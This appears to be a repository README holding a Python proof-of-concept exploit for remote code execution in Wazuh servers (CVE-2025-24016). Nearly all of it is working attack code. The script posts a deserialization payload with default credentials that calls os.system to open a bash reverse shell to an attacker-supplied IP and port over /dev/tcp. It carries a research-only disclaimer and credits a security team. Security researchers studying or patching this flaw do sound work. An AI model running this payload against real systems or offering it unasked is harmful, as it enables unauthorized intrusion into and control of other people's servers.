README.md
Rendering markdown...
import argparse
import logging
import requests
from requests.auth import HTTPBasicAuth
import pyfiglet
import os
import time
import ipaddress
from packaging import version
import sys
import urllib3
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
def color_print(text, color=None):
if color == 'error':
return f"\033[1;31m{text}\033[0m"
elif color == 'warning':
return f"\033[1;33m{text}\033[0m"
elif color == 'success':
return f"\033[1;32m{text}\033[0m"
elif color == 'info':
return f"\033[1;36m{text}\033[0m"
else:
return text
def version_check():
try:
req_version = version.parse(requests.__version__)
pyfiglet_version = version.parse(pyfiglet.__version__)
logger.info(
"Wazuh Current version:\n"
f"Requests: {req_version}\n"
f"PyFiglet: {pyfiglet_version}\n"
)
except Exception as e:
logger.error("Pengecekan versi gagal karena %s", str(e))
def parse_args():
parser = argparse.ArgumentParser(
description="Wazuh RCE Exploit POC",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
# Required
required = parser.add_argument_group("Required")
required.add_argument(
"-u", "--url", required=True,
help="URL target (ex: https://<worker-server>:55000/security/user/authenticate/run_as)"
)
required.add_argument(
"-i", "--ip", required=True,
help="LHOST for reverse shell connection"
)
required.add_argument(
"-p", "--port", required=True, type=int,
help="LPORT for reverse shell connection"
)
# Auth
auth = parser.add_argument_group("Opsi Auth")
auth.add_argument(
"-user", "--username", default="wazuh-wui",
help="Username for auth"
)
auth.add_argument(
"-pass", "--password", default="MyS3cr37P450r.*-",
help="Password for auth"
)
# Opsi tambahan
optional = parser.add_argument_group("Opsi Tambahan")
optional.add_argument(
"-c", "--config-file", type=str,
help="Path to configuration file"
)
optional.add_argument(
"-n", "--no-color", action="store_true",
help="Nonaktifkan output warna"
)
optional.add_argument(
"--version", action="version",
version="1.0",
help="Show program version"
)
return parser.parse_args()
def check_ip(ip):
try:
ipaddress.ip_address(ip)
return True
except ValueError:
logger.error("IP tidak valid: %s", ip)
return False
def check_port(port):
try:
port_int = int(port)
if 0 < port_int <= 65535:
return True
logger.error("Invalid Port: %s", port)
return False
except ValueError:
logger.error("Port tidak merupakan angka: %s", port)
return False
def check_url(url):
if not url.startswith("http"):
logger.error("Invalid URL, make sure the URL starts with http:// atau https://")
return False
return True
def main():
args = parse_args()
def local_color_print(text, color=None):
if args.no_color:
return text
return color_print(text, color)
if not check_ip(args.ip) or not check_port(args.port) or not check_url(args.url):
logger.error("Invalid IP/Port/URL")
sys.exit(1)
version_check()
ascii_motd = pyfiglet.figlet_format("Wazuh RCE")
custom_header = (
"\n" +
"---------------------------------------------------\n"
" Custom Wazuh RCE Header\n"
"---------------------------------------------------\n"
)
print(ascii_motd)
if args.config_file:
print(custom_header)
else:
print("Wazuh Server RCE - CVE-2025-24016")
print("Research & Testing Purposes Only!")
print("Unauthorized use is strictly prohibited.")
print("By: Jessie at Pelindo Cyber Security Team")
print("Credits: Aiman, Cahyo, Ihsan & the Arch \n")
# Payload
payload = {
"__unhandled_exc__": {
"__class__": "os.system",
"__args__": [
f"bash -i >& /dev/tcp/{args.ip}/{args.port} 0>&1"
]
}
}
headers = {
"Content-Type": "application/json",
"X-Header-Name": "Custom-Header"
}
# Auth
username = args.username
password = args.password
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
response = requests.post(
args.url,
json=payload,
headers=headers,
auth=HTTPBasicAuth(username, password),
verify=False,
timeout=10
)
if response.status_code != 200:
logger.error("Kode status respons: %d", response.status_code)
if "Unauthorized" in str(response.text):
logger.error("Failed Authentication")
else:
logger.error("Respons abnormal: %s", response.text)
sys.exit(1)
print(color_print("Sucess Authentication!", "success"))
print("Respons:", color_print(response.text, "info"))
except requests.exceptions.RequestException as e:
error_type = type(e).__name__
logger.error("%s: %s", error_type, str(e))
sys.exit(1)
# Opsi shell
reverse_shell_options = {
"command": "bash -i",
"reverse_port": args.port,
"timeout": 5,
"retry_count": 3
}
logger.info("Established connection reverse shell to %s:%d", args.ip, int(args.port))
time.sleep(reverse_shell_options["timeout"])
try:
s = os.system(reverse_shell_options["command"])
if s != 0:
logger.error("Reverse shell failed: %s", str(s))
finally:
if 's' in locals():
del s
print(color_print("Reverse shell success!", "success"))
if __name__ == "__main__":
main()